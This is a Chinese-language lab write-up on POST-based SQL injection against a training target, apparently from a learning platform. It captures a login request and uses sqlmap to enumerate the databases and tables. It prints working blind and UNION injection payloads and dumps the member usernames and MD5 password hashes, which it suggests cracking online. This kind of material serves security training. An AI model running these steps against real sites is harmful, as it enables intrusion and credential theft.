sqlmap学习笔记——sql注入post注入
工作环境:kali-Linux、win10
靶机:墨子学院提供的用于post漏洞SQL注入的靶机
使用到的软件:wireshark、sqlmap
在靶机网站,先随便提交一个表单,然后在windows下用wireshark捕捉了post请求的内容,post请求内容如下:
POST /login.php HTTP/1.1
Host: 219.153.49.228:47263
Connection: keep-alive
Content-Length: 25
Cache-Control: max-age=0
Origin: http://219.153.49.228:47263
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://219.153.49.228:47263/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
name=admin&password=adminHTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Sat, 16 Nov 2019 05:32:40 GMT
Content-Type: text/html;Charset=utf-8;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
...<script>alert(".....................");window.history.back();</script>
将post请求到的所有的内容全部写入kali-linux的一个文本server_post.txt
在kali里面运行
sqlmap -r server_post.txt
然后等待扫描结果
sqlmap identified the following injection point(s) with a total of 133 HTTP(s) requests:
---
Parameter: name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: name=admin' AND (SELECT 3126 FROM (SELECT(SLEEP(5)))WwGL) AND 'aQhE'='aQhE&password=adminHTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 15 Nov 2019 10:31:39 GMT
Content-Type: text/html;Charset=utf-8;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
...<script>alert(".....................");window.history.back();</script>
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: name=admin' UNION ALL SELECT CONCAT(0x716a6b6a71,0x4c736970564156577a4c4849615157696e55464368624d6b48506a6f497056586e6c74486c6a5250,0x71706b7671),62,62-- zeSV&password=adminHTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Fri, 15 Nov 2019 10:31:39 GMT
Content-Type: text/html;Charset=utf-8;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
...<script>alert(".....................");window.history.back();</script>
然后查看所有数据库
sqlmap -r server_post.txt --dbs
内容如下
available databases [5]:
[*] information_schema
[*] mozhe_Discuz_StormGroup
[*] mysql
[*] performance_schema
[*] sys
查看当前数据库
sqlmap -r server_post.txt --current-db
内容如下
[19:02:32] [INFO] fetching current database
current database: 'mozhe_Discuz_StormGroup'
查看数据库里面的表
sqlmap -r server_post.txt -D mozhe_Discuz_StormGroup --tables
内容如下
[19:04:07] [INFO] fetching tables for database: 'mozhe_Discuz_StormGroup'
[19:04:07] [INFO] used SQL query returns 2 entries
[19:04:07] [INFO] resumed: 'StormGroup_member'
[19:04:07] [INFO] resumed: 'notice'
Database: mozhe_Discuz_StormGroup
[2 tables]
+-------------------+
| StormGroup_member |
| notice |
+-------------------+
查看表的字段
sqlmap -r server_post.txt -D mozhe_Discuz_StormGroup -T StormGroup_member --columns
内容如下
Database: mozhe_Discuz_StormGroup
Table: StormGroup_member
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| name | varchar(20) |
| password | varchar(255) |
| status | int(11) |
+----------+--------------+
查看用户名跟密码
sqlmap -r server_post.txt -D mozhe_Discuz_StormGroup -T StormGroup_member -C "name,password" --dump
内容如下
Database: mozhe_Discuz_StormGroup
Table: StormGroup_member
[2 entries]
+-------+----------------------------------+
| name | password |
+-------+----------------------------------+
| mozhe | 356f589a7df439f6f744ff19bb8092c0 |
| mozhe | e2d718462e951fbef7a5ef75fcfd0dd3 |
+-------+----------------------------------+
最后密码拿去md5在线解密网站即可
https://www.cmd5.com/
参考链接:
浅谈sql注入的post注入
https://bbs.ichunqiu.com/thread-7762-1-1.html?from=bky
sql注入使用教程
https://blog.csdn.net/qq1124794084/article/details/77851094